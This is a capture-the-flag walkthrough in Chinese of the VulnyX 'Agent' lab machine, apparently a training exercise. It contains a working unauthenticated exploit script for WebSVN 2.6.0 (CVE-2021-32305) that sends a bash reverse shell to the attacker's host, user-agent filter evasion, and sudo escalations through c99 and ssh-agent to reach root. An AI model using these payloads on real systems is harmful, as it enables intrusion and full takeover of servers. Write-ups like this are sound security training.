Vlx_Agent

靶机来源：https://vulnyx.com/

难度：Low

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24               
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-30 09:47 +0800
Nmap scan report for 192.168.2.1
Host is up (0.0013s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00091s latency).
MAC Address: 08:00:27:1A:AE:91 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.66
Host is up (0.0013s latency).
MAC Address: 08:00:27:2A:5C:68 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.54 seconds

靶机IP：192.168.2.66

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.66                   
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-30 09:48 +0800
Nmap scan report for 192.168.2.66
Host is up (0.00056s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:2A:5C:68 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.13 seconds

开放端口：22、80

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80 192.168.2.66
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-30 09:48 +0800
Nmap scan report for 192.168.2.66
Host is up (0.0013s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey: 
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_  256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp open  http    nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: Welcome to nginx!
MAC Address: 08:00:27:2A:5C:68 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.26 seconds

3.udp扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100  192.168.2.66                   
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-30 09:48 +0800
Nmap scan report for 192.168.2.66
Host is up (0.0011s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:2A:5C:68 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 110.93 seconds

二、WEB渗透

1、HTTP服务

访问80端口，是nginx的页面

2、目录扫描

进行目录扫描

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.2.66 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.66
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Extensions:              php,txt,html,bak,md,db,js
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 0 / 1 (0.00%)
2026/01/30 10:25:05 the server returns a status code that matches the provided options for non existing urls. http://192.168.2.66/66c8d45a-281a-43f6-b838-8fbf76004642 => 403 (Length: 153). Please exclude the response length or the status code or set the wildcard option.. To continue please exclude the status code or the length

后端似乎存在一个黑名单，阻止了某些用户代理

3、User-Agent Bypass

gobuster`中有个参数`--random-agent`，可以随机设置`user-agent
┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.66 -w /usr/share/dirb/wordlists/common.txt -x php,txt,html,bak,md,db,js --random-agent 
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.66
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 9.22
[+] Extensions:              bak,md,db,js,php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html           (Status: 200) [Size: 615]
index.html           (Status: 200) [Size: 615]
websvn               (Status: 301) [Size: 169] [--> http://192.168.2.66/websvn/]
Progress: 36904 / 36904 (100.00%)
===============================================================
Finished
===============================================================

找到一个websvn

三、CVE-2021-32305 WebSVN 2.6.0 RCE

找到WebSVN 2.6.0，存在命令执行漏洞 利用脚本

# Exploit Title: Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
# Date: 20/06/2021
# Exploit Author: g0ldm45k
# Vendor Homepage: https://websvnphp.github.io/
# Software Link: https://github.com/websvnphp/websvn/releases/tag/2.6.0
# Version: 2.6.0
# Tested on: Docker + Debian GNU/Linux (Buster)
# CVE : CVE-2021-32305

import requests
import argparse
from urllib.parse import quote_plus

PAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/192.168.2.4/4444 0>&1'"
REQUEST_PAYLOAD = '/websvn/search.php?search=";{};"'

parser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.')
parser.add_argument('target', type=str, help="Target URL.")

args = parser.parse_args()

if args.target.startswith("http://") or args.target.startswith("https://"):
    target = args.target
else:
    print("[!] Target should start with either http:// or https://")
    exit()

requests.get(target + REQUEST_PAYLOAD.format(quote_plus(PAYLOAD)))

print("[*] Request send. Did you get what you wanted?")

成功获取到shell

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.66] 59424
bash: cannot set terminal process group (375): Inappropriate ioctl for device
bash: no job control in this shell
www-data@agent:~/html/websvn$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

四、权限提升

1、获取dustin权限

查看sudo -l

www-data@agent:~/html/websvn$ sudo -l
sudo -l
Matching Defaults entries for www-data on agent:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User www-data may run the following commands on agent:
    (dustin) NOPASSWD: /usr/bin/c99

/usr/bin/c99是gcc的别名 直接进行提权，获取到dustin的权限

www-data@agent:~/html/websvn$ sudo -u dustin /usr/bin/c99 -wrapper /bin/sh,-s .
<$ sudo -u dustin /usr/bin/c99 -wrapper /bin/sh,-s .
id
uid=1000(dustin) gid=1000(dustin) groups=1000(dustin)

2、获取root权限

查看sudo -l

dustin@agent:/var/www/html/websvn$ sudo -l
Matching Defaults entries for dustin on agent:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User dustin may run the following commands on agent:
    (root) NOPASSWD: /usr/bin/ssh-agent

直接进行提权

dustin@agent:/var/www/html/websvn$ sudo /usr/bin/ssh-agent /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)

五、查看FLAG

# cat /root/root.txt /home/dustin/user.txt
51ff843faf1bc11c162e973cf852ffae
d31788f2e636e115b417e0a61c6b69e0